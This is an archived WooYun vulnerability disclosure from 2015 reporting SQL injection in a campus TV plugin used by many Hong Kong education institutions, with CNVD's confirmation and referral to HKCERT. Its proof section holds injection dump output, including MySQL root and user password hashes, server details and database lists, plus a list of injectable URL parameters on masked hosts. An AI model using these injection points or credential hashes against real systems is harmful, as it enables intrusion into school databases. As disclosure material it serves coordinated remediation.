当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156762

漏洞标题:某教育機構通用系統SQL注入 影響範圍涉及大量的香港的教育機構(香港地區)

相关厂商:某教育機構通用系統

漏洞作者: 雅柏菲卡

提交时间:2015-11-29 14:38

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-29: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-27: 细节向核心白帽子及相关领域专家公开
2016-02-06: 细节向普通白帽子公开
2016-02-16: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

.................

详细说明:

..............

漏洞证明:

1、Target: 		http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=18
Host IP: **.**.**.**
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 177 ms
Current User: junior@localhost
Sql Version: 5.0.95
Current DB: junior20
System User: junior@localhost
Host Name: localhost.localdomain
Installation dir: /usr/
Compile OS: redhat-linux-gnu
DB User & Pass: root:099c57832c229443:localhost
root::localhost.localdomain
::localhost.localdomain
::localhost
junior:2ada82db707ef173:localhost
Data Bases: information_schema
junior20
junior20Sbj
junior20_c1
junior20_c11
junior20_c13
junior20_c14
junior20_c15
junior20_c17
junior20_c19
junior20_c2
junior20_c24
junior20_c3
junior20_c4
junior20_c5
junior20_c7
junior20_c9
junior20_eClass_LIBMS
mysql
test
2、Target: http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=5
Host IP: **.**.**.**
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 307 ms
Current User: junior@localhost
Sql Version: 5.0.95-log
Current DB: junior20
System User: junior@localhost
Host Name: **.**.**.**
Installation dir: /usr/
Compile OS: redhat-linux-gnu
DB User & Pass: root:072ac1f153181a09:localhost
root:773359240eb9a1d9:localhost.localdomain
root:773359240eb9a1d9:**.**.**.**
::localhost
::localhost.localdomain
eclass:4b3e02b86615b7fa:localhost
junior:4b3e02b86615b7fa:localhost
ifolderadmin:4a48347a20d500ee:localhost
Data Bases: information_schema
iusers
junior20
junior20Sbj
junior20_c1
junior20_c108
junior20_c109
junior20_c11
junior20_c110
junior20_c111
junior20_c112
junior20_c113
junior20_c114
junior20_c117
junior20_c118
junior20_c119
junior20_c12
junior20_c120
junior20_c121
junior20_c122
junior20_c123
junior20_c13
junior20_c14
junior20_c15
junior20_c16
junior20_c17
junior20_c18
junior20_c19
junior20_c2
junior20_c20
junior20_c21
junior20_c22
junior20_c23
junior20_c24
junior20_c25
junior20_c26
junior20_c27
junior20_c28
junior20_c29
junior20_c30
junior20_c31
junior20_c33
junior20_c34
junior20_c35
junior20_c36
junior20_c41
junior20_c42
junior20_c44
junior20_c48
junior20_c49
junior20_c50
junior20_c51
junior20_c52
junior20_c53
junior20_c59
junior20_c60
junior20_c61
junior20_c64_old
junior20_c65
junior20_c67
junior20_eClass_LIBMS
mysql
test
3、Target: http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=4
Host IP: **.**.**.**
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 265 ms
Current User: junior@localhost
Sql Version: 5.0.95
Current DB: junior20
System User: junior@localhost
Host Name: d08s003e
Installation dir: /usr/
Compile OS: redhat-linux-gnu
4、Target: **.**.**.**/home/plugin/campustv/?archive=1&channelID=16
Host IP: **.**.**.**
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 214 ms
Current User: junior@localhost
Sql Version: 5.0.95
Current DB: junior20
System User: junior@localhost
Host Name: localhost.localdomain
Installation dir: /usr/
Compile OS: redhat-linux-gnu
DB User & Pass: root:68f1bb174c348224:localhost
root::localhost.localdomain
::localhost.localdomain
::localhost
junior:3762369a1826cfa7:localhost
Data Bases: information_schema
junior20
junior20Sbj
junior20_20130712
junior20_20130820
junior20_c1
junior20_c112
junior20_c116
junior20_c121
junior20_c123
junior20_c125
junior20_c127
junior20_c129
junior20_c130
junior20_c37
junior20_c38
junior20_c39
junior20_c40
junior20_c41
junior20_c42
junior20_c43
junior20_c44
junior20_c45
junior20_c46
junior20_c47
junior20_c48
junior20_c49
junior20_c51
junior20_c52
junior20_c53
junior20_c54
junior20_c56
junior20_c57
junior20_c58
junior20_c59
junior20_c62
junior20_c63
junior20_c64
junior20_c65
junior20_c68
junior20_c69
junior20_c71
junior20_c72
junior20_c73
junior20_eClass_LIBMS
mysql
test
5、Target: http://**.**.**.**/home/plugin/campustv/?archive=1&ClipID=454
Host IP: **.**.**.**
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 204 ms
Current User: junior@localhost
Sql Version: 5.0.95-log
Current DB: junior20
System User: junior@localhost
Host Name: localhost.localdomain
Installation dir: /usr/
DB User & Pass: root:4a23ead20d8aa0de:localhost
Compile OS: redhat-linux-gnu
root::localhost.localdomain
::localhost.localdomain
::localhost
junior:2bdebc36730c2816:localhost
Data Bases: information_schema
junior20
junior20Sbj
junior20_20120906
junior20_c10
junior20_c13
junior20_c14
junior20_c15
junior20_c16
junior20_c19
junior20_c2
junior20_c20
junior20_c21
junior20_c22
junior20_c25
junior20_c26
junior20_c27
junior20_c28
junior20_c3
junior20_c31
junior20_c32
junior20_c33
junior20_c34
junior20_c37
junior20_c4
junior20_c41
junior20_c59
junior20_c67
junior20_c68
junior20_c69
junior20_c7
junior20_c70
junior20_c79
junior20_c8
junior20_c80
junior20_c81
junior20_c82
junior20_c83
junior20_c84
junior20_c85
junior20_c87
junior20_c88
junior20_c89
junior20_c9
junior20_eClass_LIBMS
mysql
test
附上一堆案例
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=6
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=85
http://**.**.**.**/home/plugin/campustv/?archive=1&ClipID=4
http://**.**.**.**/home/plugin/campustv/?archive=1&ClipID=49
http://**.**.**.**/home/plugin/campustv/?archive=1&ClipID=287
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=7
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=18
http://**.**.**.**/home/plugin/campustv/?archive=1&ClipID=110
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=35
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=22
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=46
**.**.**.**/home/plugin/campustv/?archive=1&ClipID=748
http://**.**.**.**/home/plugin/campustv/?archive=1&ClipID=63
http://**.**.**.**/home/plugin/campustv/?archive=1&ClipID=69
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=27
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=18
http://**.**.**.**/home/plugin/campustv/?archive=1&ClipID=454
**.**.**.**/home/plugin/campustv/?archive=1&channelID=16
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=4
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=5
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=12
http://**.**.**.**/home/plugin/campustv/?archive=1&channelID=18

修复方案:

............

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-03 17:25

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向HKCERT通报,由其后续协调网站管理单位处置。

最新状态:

暂无